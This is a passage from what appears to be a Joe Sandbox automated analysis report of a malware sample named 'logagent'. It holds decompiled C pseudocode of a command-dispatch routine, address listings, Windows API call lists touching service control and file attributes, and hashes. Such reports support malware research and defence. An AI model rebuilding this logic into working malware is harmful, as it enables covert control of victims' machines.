				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_a8, 0x41b310,  &_v40,  &_v40, 1);
				_t233 = _t230 + 0x24;
				_t69 = _t139 - 1;
				if(_t69 == 0) {
					E00412855(_t233 - 0xc, _t233 - 0xc, E004113C9( &_v216));
					E004020C2(0x41c130);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(0x79);
					L26:
					_t74 = E004017DD( &_v20);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t74;
				}
				_t75 = _t69 - 1;
				if(_t75 == 0) {
					_t76 = E004119AD( &_v20, 0);
					_t235 = _t233 - 0x10;
					_push(_t76);
					E00412881(_t76);
					_t78 = E00411700(_t235);
					_t236 = _t235 + 0x10;
					__eflags = _t78;
					if(_t78 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x80);
						L14:
						E004020C2(0x41c130);
						goto L26;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t83 =  &_v184;
					_push(_t83);
					L00414140();
					_push(_t83);
					L00414140();
					E004020C2(0x41c130, 0x7a, _t236 - 0x10);
					L23:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L26;
				}
				_t85 = _t75 - 1;
				if(_t85 == 0) {
					_t86 = E004119AD( &_v20, 0);
					_t241 = _t233 - 0x10;
					_push(_t86);
					E00412881(_t86);
					_t88 = E00411760(_t241);
					_t242 = _t241 + 0x10;
					__eflags = _t88;
					if(_t88 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x81);
						goto L14;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t92 =  &_v152;
					_push(_t92);
					L00414140();
					_push(_t92);
					L00414140();
					E004020C2(0x41c130, 0x7b, _t242 - 0x10);
					goto L23;
				}
				_t94 = _t85 - 1;
				if(_t94 == 0) {
					_t95 = E004119AD( &_v20, 0);
					_t247 = _t233 - 0x10;
					_push(_t95);
					E00412881(_t95);
					_t97 = E00411859(_t247);
					_t248 = _t247 + 0x10;
					__eflags = _t97;
					if(_t97 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x82);
						goto L14;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t101 =  &_v120;
					_push(_t101);
					L00414140();
					_push(_t101);
					L00414140();
					E004020C2(0x41c130, 0x7c, _t248 - 0x10);
					goto L23;
				}
				_t103 = _t94 - 1;
				if(_t103 == 0) {
					_t104 = E004119AD( &_v20, 0);
					_t253 = _t233 - 0x10;
					_push(_t104);
					E00412881(_t104);
					_t106 = E004118C0(_t253);
					_t254 = _t253 + 0x10;
					__eflags = _t106;
					if(_t106 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x83);
						goto L14;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t110 =  &_v88;
					_push(_t110);
					L00414140();
					_push(_t110);
					L00414140();
					E004020C2(0x41c130, 0x7d, _t254 - 0x10);
					goto L23;
				}
				_t112 = _t103 - 1;
				if(_t112 == 0) {
					E00412881(_t113);
					_v24 = E004117C7(_t233 - 0x10);
					_t118 =  &_v72;
					L00414140();
					_t119 =  &_v136;
					L00414140();
					_t120 =  &_v56;
					L00414140();
					L0041417C();
					E004020C2(0x41c130, 0x7f, _t233 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t120, _t120, _t119, _t119, _t118, _t118, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, _v24, E004119AD( &_v20, 0));
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L23;
				}
				if(_t112 != 1) {
					goto L26;
				}
				_t123 = E004119AD( &_v20, 2);
				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
				_push( *_t123);
				_t125 = E004119AD( &_v20, 0);
				_t264 = _t233 - 0x10;
				_push(_t125);
				_push(_t264);
				E00412881(_t125);
				_t127 = E00411927();
				_t265 = _t264 + 0x14;
				if(_t127 == 0) {
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t130 =  &_v104;
					_push(_t130);
					L00414140();
					_push(_t130);
					L00414140();
					E004020C2(0x41c130, 0x84, _t265 - 0x10);
				} else {
					_t135 =  &_v200;
					L00414140();
					_t136 =  &_v168;
					L00414140();
					_t137 =  &_v40;
					L00414140();
					L00414140();
					E004020C2(0x41c130, 0x7e, _t265 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t137, _t137, _t136, _t136, _t135, _t135, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, E004119AD( &_v20, 2));
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				}
				goto L23;
			}



























































                                  0x00410f16
                                  0x00410f1c
                                  0x00410f2e
                                  0x00410f38
                                  0x00410f41
                                  0x00410f52
                                  0x00410f61
                                  0x00410f6b
                                  0x00410f73
                                  0x00410f76
                                  0x00410f77
                                  0x00411394
                                  0x004113a2
                                  0x004113ad
                                  0x004113b3
                                  0x004113b6
                                  0x004113be
                                  0x004113c8
                                  0x004113c8
                                  0x00410f7d
                                  0x00410f7e
                                  0x004112f5
                                  0x004112fa
                                  0x004112ff
                                  0x00411301
                                  0x00411308
                                  0x0041130d
                                  0x00411310
                                  0x00411312
                                  0x00411371
                                  0x00411377
                                  0x004111ce
                                  0x004111d3
                                  0x00000000
                                  0x004111d3
                                  0x00411326
                                  0x00411327
                                  0x0041132e
                                  0x0041132f
                                  0x00411335
                                  0x00411336
                                  0x0041133e
                                  0x00411340
                                  0x0041134f
                                  0x0041135a
                                  0x0041135a
                                  0x00000000
                                  0x0041135a
                                  0x00410f84
                                  0x00410f85
                                  0x00411268
                                  0x0041126d
                                  0x00411272
                                  0x00411274
                                  0x0041127b
                                  0x00411280
                                  0x00411283
                                  0x00411285
                                  0x004112e1
                                  0x004112e7
                                  0x00000000
                                  0x004112e7
                                  0x00411299
                                  0x0041129a
                                  0x004112a1
                                  0x004112a2
                                  0x004112a8
                                  0x004112a9
                                  0x004112b1
                                  0x004112b3
                                  0x004112c2
                                  0x00000000
                                  0x004112c7
                                  0x00410f8b
                                  0x00410f8c
                                  0x004111e1
                                  0x004111e6
                                  0x004111eb
                                  0x004111ed
                                  0x004111f4
                                  0x004111f9
                                  0x004111fc
                                  0x004111fe
                                  0x00411254
                                  0x0041125a
                                  0x00000000
                                  0x0041125a
                                  0x00411212
                                  0x00411213
                                  0x0041121a
                                  0x0041121b
                                  0x0041121e
                                  0x0041121f
                                  0x00411227
                                  0x00411229
                                  0x00411238
                                  0x00000000
                                  0x0041123d
                                  0x00410f92
                                  0x00410f93
                                  0x00411150
                                  0x00411155
                                  0x0041115a
                                  0x0041115c
                                  0x00411163
                                  0x00411168
                                  0x0041116b
                                  0x0041116d
                                  0x004111c3
                                  0x004111c9
                                  0x00000000
                                  0x004111c9
                                  0x00411181
                                  0x00411182
                                  0x00411189
                                  0x0041118a
                                  0x0041118d
                                  0x0041118e
                                  0x00411196
                                  0x00411198
                                  0x004111a7
                                  0x00000000
                                  0x004111ac
                                  0x00410f99
                                  0x00410f9a
                                  0x004110c5
                                  0x004110d1
                                  0x004110f0
                                  0x004110f4
                                  0x004110fd
                                  0x00411104
                                  0x0041110d
                                  0x00411111
                                  0x0041111b
                                  0x0041112a
                                  0x00411132
                                  0x0041113e
                                  0x00000000
                                  0x00411144
                                  0x00410fa1
                                  0x00000000
                                  0x00000000
                                  0x00410fad
                                  0x00410fb4
                                  0x00410fbf
                                  0x00410fc1
                                  0x00410fc6
                                  0x00410fcb
                                  0x00410fcc
                                  0x00410fcd
                                  0x00410fd4
                                  0x00410fd9
                                  0x00410fde
                                  0x0041107f
                                  0x00411080
                                  0x00411087
                                  0x00411088
                                  0x0041108b
                                  0x0041108c
                                  0x00411094
                                  0x00411096
                                  0x004110a8
                                  0x00410fe4
                                  0x0041100b
                                  0x00411012
                                  0x0041101b
                                  0x00411022
                                  0x0041102b
                                  0x0041102f
                                  0x00411039
                                  0x00411048
                                  0x00411050
                                  0x0041105c
                                  0x00411062
                                  0x00000000

                                  APIs
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410F16
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6DF55DF0), ref: 00410F2E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410F38
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410F41
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00410F52
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410F61
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,00000000), ref: 00411012
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000), ref: 00411022
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 0041102F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007E,?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411050
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 0041105C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411039
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041108C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411096
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002,00000000), ref: 00410FB4
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                    • Part of subcall function 00411927: OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                    • Part of subcall function 00411927: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                    • Part of subcall function 00411927: OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                    • Part of subcall function 00411927: CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                    • Part of subcall function 00411927: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,?), ref: 004110F4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,?), ref: 00411104
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00411111
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 0041111B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007F,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00411132
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 0041113E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041118E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411198
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041121F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411229
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 004112A9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 004112B3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 00411336
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411340
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007A,?,?,?,?,0041B310,00000000), ref: 0041135A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00411371
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000079), ref: 004113AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00000000), ref: 004113BE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??1?$basic_string@$??0?$basic_string@V01@@$G@2@@std@@G@std@@$?length@?$basic_string@$V12@$??4?$basic_string@?c_str@?$basic_string@?substr@?$basic_string@A?$basic_string@OpenServiceV01@$??2@??3@?find@?$basic_string@CloseD@1@@G@1@@HandleManagerV10@
                                  • String ID:
                                  • API String ID: 3693186435-0
                                  • Opcode ID: 6a031edbff3384601f4aa8fc1298ee73ab53d8128c0f2dcfe8a7b61f8d4f597b
                                  • Instruction ID: 8efa13a56e58a3380b66c3db6183ea909b867b6e0f3936dc641b94412a702233
                                  • Opcode Fuzzy Hash: 6a031edbff3384601f4aa8fc1298ee73ab53d8128c0f2dcfe8a7b61f8d4f597b
                                  • Instruction Fuzzy Hash: E6C1B4B1D101086BDB04B7A2ED56DFF777CEB50304F00481EFA16A71D2EE395A89C66A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004055E7 Relevance: 54.2, APIs: 36, Instructions: 168sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(00002710), ref: 00405607
                                    • Part of subcall function 00405532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                    • Part of subcall function 00405532: CreateFileW.KERNEL32(00000000), ref: 00405569
                                    • Part of subcall function 00405532: GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                    • Part of subcall function 00405532: Sleep.KERNEL32(00002710), ref: 004055A7
                                    • Part of subcall function 00405532: CloseHandle.KERNEL32(00000000), ref: 004055AE
                                    • Part of subcall function 00405532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405619
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040562E
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040563F
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00405646
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00405651
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00405658
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00405669
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 00405670
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405681
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 00405690
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040569D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056AA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004056C5
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004056D0
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056DC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004056F0
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 004056F7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405708
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405714
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405729
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040574D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405756
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405733
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040575F
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040576F
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405778
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405782
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040579A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004057AA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057BB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057C4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 004057D1
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 004057E2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 004057F1
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 004057F8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@CloseD@2@@0@DirectoryExistsHandlePathSizeV?$basic_string@Y?$basic_string@
                                  • String ID:
                                  • API String ID: 3042614570-0
                                  • Opcode ID: 575ddf90373583570e2370749e334e5a8c8c652185d1d6edf2812296b84c8a7a
                                  • Instruction ID: c86808d706488c02b7588af0601caf96bbb35f31f7bc76b7b462248bc21621a9
                                  • Opcode Fuzzy Hash: 575ddf90373583570e2370749e334e5a8c8c652185d1d6edf2812296b84c8a7a
                                  • Instruction Fuzzy Hash: B0514E72A00909EBCB05ABA0ED5DADE7B78EF84315F04807AF503A71A0DF745A45CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004059BE Relevance: 50.9, APIs: 25, Strings: 4, Instructions: 158sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E004059BE(intOrPtr __ecx) {
				char _v5;
